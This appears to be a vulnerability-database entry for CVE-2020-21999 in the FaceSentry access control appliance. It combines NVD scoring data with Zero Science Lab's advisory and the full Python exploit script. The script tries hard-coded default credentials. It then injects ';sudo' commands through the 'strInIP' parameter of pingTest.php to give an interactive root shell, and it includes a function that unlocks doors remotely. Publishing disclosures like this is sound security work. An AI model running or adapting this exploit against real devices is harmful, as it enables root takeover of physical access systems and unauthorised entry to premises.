Description
iWT Ltd FaceSentry Access Control System 6.4.8 suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'strInIP' POST parameter in pingTest PHP script.
Affected Software
Related
{"id": "CVE-2020-21999", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-21999", "description": "iWT Ltd FaceSentry Access Control System 6.4.8 suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'strInIP' POST parameter in pingTest PHP script.", "published": "2021-05-04T16:15:00", "modified": "2021-05-11T19:22:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.0}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-21999", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/47066", "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php"], "cvelist": ["CVE-2020-21999"], "immutableFields": [], "lastseen": "2022-03-23T15:09:12", "viewCount": 32, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47066"]}, {"type": "zeroscience", "idList": ["ZSL-2019-5525"]}], "rev": 4}, "score": {"value": 5.6, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-05-05T08:50:05", "tweets": [{"link": "https://twitter.com/SecRiskRptSME/status/1389841619541766146", "text": "New/Modified vulnerability published May 04, 2021 at 09:15AM on the NVD: CVE-2020-21999 https://t.co/LNaEaXmxNk?amp=1 iWT Ltd FaceSentry Access Control System 6.4.8 suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to in\u2026"}, {"link": "https://twitter.com/SecRiskRptSME/status/1389841619541766146", "text": "New/Modified vulnerability published May 04, 2021 at 09:15AM on the NVD: CVE-2020-21999 https://t.co/LNaEaXmxNk?amp=1 iWT Ltd FaceSentry Access Control System 6.4.8 suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to in\u2026"}]}, "backreferences": {"references": [{"type": "zeroscience", "idList": ["ZSL-2019-5525"]}]}, "exploitation": null, "vulnersScore": 5.6}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/o:iwt:facesentry_access_control_system_firmware:5.7.0", "cpe:/o:iwt:facesentry_access_control_system_firmware:6.4.8", "cpe:/o:iwt:facesentry_access_control_system_firmware:5.7.2"], "cpe23": ["cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.0:*:*:*:*:*:*:*", "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:6.4.8:*:*:*:*:*:*:*"], "cwe": ["CWE-78"], "affectedSoftware": [{"cpeName": "iwt:facesentry_access_control_system_firmware", "version": "5.7.0", "operator": "eq", "name": "iwt facesentry access control system firmware"}, {"cpeName": "iwt:facesentry_access_control_system_firmware", "version": "5.7.2", "operator": "eq", "name": "iwt facesentry access control system firmware"}, {"cpeName": "iwt:facesentry_access_control_system_firmware", "version": "6.4.8", "operator": "eq", "name": "iwt facesentry access control system firmware"}], "affectedConfiguration": [{"name": "iwt facesentry access control system", "cpeName": "iwt:facesentry_access_control_system", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.0:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.2:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:6.4.8:*:*:*:*:*:*:*", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:iwt:facesentry_access_control_system:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://www.exploit-db.com/exploits/47066", "name": "Exploit Database", "refsource": "EXPLOIT-DB", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php", "name": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"zeroscience": [{"lastseen": "2021-12-30T18:22:43", "description": "Title: FaceSentry Access Control System 6.4.8 Remote Root Exploit \nAdvisory ID: [ZSL-2019-5525](<ZSL-2019-5525.php>) \nType: Local/Remote \nImpact: System Access \nRisk: (5/5) \nRelease Date: 30.06.2019 \n\n\n##### Summary\n\nFaceSentry 5AN is a revolutionary smart identity management appliance that offers entry via biometric face identification, contactless smart card, staff ID, or QR-code. The QR-code upgrade allows you to share an eKey with guests while you're away from your Office and monitor all activity via the web administration tool. Powered by standard PoE (Power over Ethernet), FaceSEntry 5AN can be installed in minutes with only 6 screws. FaceSentry 5AN is a true enterprise grade access control or time-and-attendance appliance. \n\n##### Description\n\nFaceSentry suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'strInIP' POST parameter in pingTest PHP script. \n \n\\-------------------------------------------------------------------------------- \n \n` /pingTest.php: \n-------------- \n8: if (!isAuth('TestTools','R')){ \n9: echo \"No Permission\"; \n10: include(\"footer.php\"); \n11: exit; \n12: } \n13: \n14: if(isset($_POST[\"strInIP\"])){ \n15: $strInIP = $_POST[\"strInIP\"]; \n16: }else{ \n17: $strInIP = \"\"; \n18: } \n19: \n20: $strOperationResult = \"\"; \n21: if ($strInIP != \"\"){ \n22: \n23: $out = array(); \n24: exec(\"sudo ping -c 4 $strInIP\",$out); \n25: $result = \"\"; \n26: foreach($out as $line){ \n27: $result = $result.$line.\"<br>\"; \n28: } \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\niWT Ltd. - <http://www.iwt.com.hk>\n\n##### Affected Version\n\nFirmware 6.4.8 build 264 (Algorithm A16) \nFirmware 5.7.2 build 568 (Algorithm A14) \nFirmware 5.7.0 build 539 (Algorithm A14) \n\n##### Tested On\n\nLinux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus) \nLinux 3.4.113-sun8i (armv7l) \nPHP/7.0.30-0ubuntu0.16.04.1 \nPHP/7.0.22-0ubuntu0.16.04.1 \nlighttpd/1.4.35 \nArmbian 5.38 \nSunxi Linux (sun8i generation) \nOrange Pi PC + \n\n##### Vendor Status\n\n[28.05.2019] Vulnerability discovered. \n[29.05.2019] Vendor contacted. \n[12.06.2019] No response from the vendor. \n[13.06.2019] Vendor contacted. \n[27.06.2019] No response from the vendor. \n[28.06.2019] Vendor contacted. \n[29.06.2019] No response from the vendor. \n[30.06.2019] Public security advisory released. \n\n##### PoC\n\n[biometac.py](<../../codes/biometac.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/47066> \n[2] <https://packetstormsecurity.com/files/153490> \n[3] <https://cxsecurity.com/issue/WLB-2019070014> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/163187> \n[5] <https://github.com/zeroscience/advisory/blob/master/ZSL-2019-5525> \n[6] <https://raw.githubusercontent.com/zeroscience/advisory/master/ZSL-2019-5525> \n[7] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-21999> \n[8] <https://nvd.nist.gov/vuln/detail/CVE-2020-21999> \n[9] <https://security-tracker.debian.org/tracker/CVE-2020-21999> \n[10] <https://www.tenable.com/cve/CVE-2020-21999> \n[11] <https://cve.report/CVE-2020-21999>\n\n##### Changelog\n\n[30.06.2019] - Initial release \n[04.07.2019] - Added reference [1], [2], [3], [4], [5] and [6] \n[19.06.2021] - Added reference [7], [8], [9], [10] and [11] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-30T00:00:00", "type": "zeroscience", "title": "FaceSentry Access Control System 6.4.8 Remote Root Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-21999"], "modified": "2019-06-30T00:00:00", "id": "ZSL-2019-5525", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php", "sourceData": "<html><body><p>#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n#\r\n# FaceSentry Access Control System 6.4.8 Remote Root Exploit\r\n#\r\n#\r\n# Vendor: iWT Ltd.\r\n# Product web page: http://www.iwt.com.hk\r\n# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)\r\n# Firmware 5.7.2 build 568 (Algorithm A14)\r\n# Firmware 5.7.0 build 539 (Algorithm A14)\r\n#\r\n# Summary: FaceSentry 5AN is a revolutionary smart identity\r\n# management appliance that offers entry via biometric face\r\n# identification, contactless smart card, staff ID, or QR-code.\r\n# The QR-code upgrade allows you to share an eKey with guests\r\n# while you're away from your Office and monitor all activity\r\n# via the web administration tool. Powered by standard PoE\r\n# (Power over Ethernet), FaceSEntry 5AN can be installed in\r\n# minutes with only 6 screws. FaceSentry 5AN is a true enterprise\r\n# grade access control or time-and-attendance appliance.\r\n#\r\n# Desc: FaceSentry suffers from an authenticated OS command\r\n# injection vulnerability using default credentials. This can\r\n# be exploited to inject and execute arbitrary shell commands\r\n# as the root user via the 'strInIP' POST parameter in pingTest\r\n# PHP script.\r\n#\r\n# ==============================================================\r\n# /pingTest.php:\r\n# --------------\r\n# 8: if (!isAuth('TestTools','R')){\r\n# 9: echo \"No Permission\";\r\n# 10: include(\"footer.php\");\r\n# 11: exit;\r\n# 12: }\r\n# 13:\r\n# 14: if(isset($_POST[\"strInIP\"])){\r\n# 15: $strInIP = $_POST[\"strInIP\"];\r\n# 16: }else{\r\n# 17: $strInIP = \"\";\r\n# 18: }\r\n# 19:\r\n# 20: $strOperationResult = \"\";\r\n# 21: if ($strInIP != \"\"){\r\n# 22:\r\n# 23: $out = array(); \r\n# 24: exec(\"sudo ping -c 4 $strInIP\",$out);\r\n# 25: $result = \"\"; \r\n# 26: foreach($out as $line){\r\n# 27: $result = $result.$line.\"<br/>\"; \r\n# 28: }\r\n# ==============================================================\r\n#\r\n# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)\r\n# Linux 3.4.113-sun8i (armv7l)\r\n# PHP/7.0.30-0ubuntu0.16.04.1\r\n# PHP/7.0.22-0ubuntu0.16.04.1\r\n# lighttpd/1.4.35\r\n# Armbian 5.38\r\n# Sunxi Linux (sun8i generation)\r\n# Orange Pi PC +\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2019-5525\r\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php\r\n#\r\n#\r\n# 28.05.2019\r\n#\r\n\r\nimport datetime########INITIALIZE\r\nimport urllib2#########BIOMETRICS\r\nimport urllib##########FACIAL.REC\r\nimport time############OGNITION.S\r\nimport sys##(.)###(.)##YSTEM.DOOR\r\nimport re#######O######UNLOCKED.A\r\nimport os#######_######CCESS.GRAN\r\nimport io######(_)#####TED.0B1000\r\nimport py##############1.11111011\r\n\r\nfrom cookielib import CookieJar\r\n\r\nglobal pajton\r\npajton = os.path.basename(sys.argv[0])\r\n\r\ndef usage():\r\n if len(sys.argv) < 2:\r\n print '[+] Usage: ./' + pajton + ' <ip>\\n'\r\n sys.exit()\r\n\r\ndef auth():\r\n brojac = 0\r\n usernames = [ 'admin', 'user', 'administrator' ] # case sensitive\r\n passwords = [ '123', '123', '123456' ]\r\n while brojac < 3:\r\n podatoci = { 'strInLogin' : usernames[brojac],\r\n 'strInPassword' : passwords[brojac],\r\n 'saveLogin' : '1',\r\n 'saveFor' : '168' } # 7 days\r\n print '[+] Trying creds ' + usernames[brojac] + ':' + passwords[brojac]\r\n nesto_encode = urllib.urlencode(podatoci)\r\n ajde.open('http://' + target + '/login.php', nesto_encode)\r\n check = ajde.open('http://' + target + '/sentryInfo.php')\r\n dool = re.search(r'Hardware Key', check.read())\r\n if dool:\r\n print '[+] That worked!'\r\n break\r\n else:\r\n brojac += 1\r\n if brojac == 3:\r\n print '[!] Ah ah ah. You didn\\'t say the magic word!'\r\n sys.exit()\r\n\r\ndef door():\r\n unlock = raw_input('[*] Unlock door No.: ') # default door number = 0\r\n try:\r\n br = int(unlock)\r\n panel = { 'strInAction' : 'openDoor',\r\n 'strInPanelNo' : br,\r\n 'strInRestartAction' : '',\r\n 'strPanelIDRestart' : '',\r\n 'strPanelRestartAction' : '' }\r\n nesto_encode = urllib.urlencode(panel)\r\n ajde.open('http://' + target + '/openDoor.php', nesto_encode)\r\n print '[+] Door ' + unlock + ' is unlocked!'\r\n except ValueError:\r\n print '[!] Only values from 0 to 8 are valid.'\r\n door()\r\n\r\ndef main():\r\n if os.name == 'posix':\r\n os.system('clear')\r\n if os.name == 'nt':\r\n os.system('cls')\r\n\r\n vremetodeneska = datetime.datetime.now()\r\n kd = vremetodeneska.strftime('%d.%m.%Y %H:%M:%S')\r\n print 'Starting exploit at ' + kd\r\n\r\n print '''\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\r\n\u2500\u2500FaceSentry Access Control System\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500Remote Root Exploit\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500Zero Science Lab\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500www.zeroscience.mk\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500ZSL-2019-5525\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u258c\u2590\u2591\u2580\u2591\u2580\u2591\u2580\u2590\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u258c\u2591\u258c\u2591\u2591\u2591\u2591\u2591\u2590\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u258c\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2590\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2584\u2580\u2580\u2580\u2580\u2580\u258c\u2584\u2588\u2584\u2591\u2584\u2588\u2584\u2590\u2580\u2580\u2580\u2580\u2580\u2584\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2588\u2592\u2592\u2592\u2592\u2592\u2590\u2591\u2591\u2591\u2591\u2584\u2591\u2591\u2591\u2591\u258c\u2592\u2592\u2592\u2592\u2592\u2588\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u258c\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2591\u2580\u2580\u2580\u2580\u2580\u2591\u2588\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2590\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2588\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2588\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u258c\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u258c\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u258c\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2590\u2592\u2592\u2592\u2592\u2592\u2592\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2590\u2584\u2584\u2584\u2584\u2584\u2584\u258c\u258c\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258c\u2590\u2584\u2584\u2584\u2584\u2584\u2584\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2588\u2580\u2580\u2580\u2580\u2588\u2500\u258c\u2588\u2588\u2588\u258c\u2588\u2588\u2588\u258c\u2500\u2588\u2580\u2580\u2580\u2580\u2588\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2590\u2591\u2591\u2591\u2591\u258c\u2500\u258c\u2588\u2588\u2588\u258c\u2588\u2588\u2588\u258c\u2500\u2590\u2591\u2591\u2591\u2591\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2580\u2580\u2580\u2580\u2500\u2500\u258c\u2588\u2588\u2588\u258c\u2588\u2588\u2588\u258c\u2500\u2500\u2580\u2580\u2580\u2580\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u258c\u2588\u2588\u2588\u258c\u2588\u2588\u2588\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u258c\u2588\u2588\u2588\u258c\u2588\u2588\u2588\u258c\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2590\u2580\u2580\u2580\u2588\u2588\u258c\u2588\u2580\u2580\u2580\u258c\r\n\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2590\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u258c\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\u2592\r\n '''\r\n\r\n usage()\r\n tegla = CookieJar()\r\n global ajde, target\r\n target = sys.argv[1]\r\n ajde = urllib2.build_opener(urllib2.HTTPCookieProcessor(tegla))\r\n auth()\r\n raw_input('\\n[*] Press [ENTER] to land... ')\r\n\r\n print '[+] Entering interactive (web)shell...'\r\n time.sleep(1)\r\n print\r\n\r\n while True:\r\n try:\r\n cmd = raw_input('root@facesentry:~# ')\r\n if 'exit' in cmd.strip():\r\n print '[+] Take care now, bye bye then!'\r\n break\r\n if 'door' in cmd.strip():\r\n door()\r\n continue\r\n podatoci = { 'strInIP' : ';sudo ' + cmd } # |cmd\r\n nesto_encode = urllib.urlencode(podatoci)\r\n r_izraz = ajde.open('http://' + target + '/pingTest.php?', nesto_encode)\r\n pattern = re.search(cmd+'\\)<[^>]*>(.*?)', r_izraz.read())\r\n x = pattern.groups()[0].strip()\r\n y = x.replace('<br/>', '\\n')\r\n print y.strip()\r\n except Exception as i:\r\n print '[-] Error: ' + i.message\r\n pass\r\n except KeyboardInterrupt as k:\r\n print '\\n[+] Interrupter!'\r\n sys.exit()\r\n\r\n sys.exit()\r\n\r\nif __name__ == \"__main__\":\r\n main()</ip></p></body></html>", "sourceHref": "http://zeroscience.mk/codes/biometac.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}
CVE-2020-21999
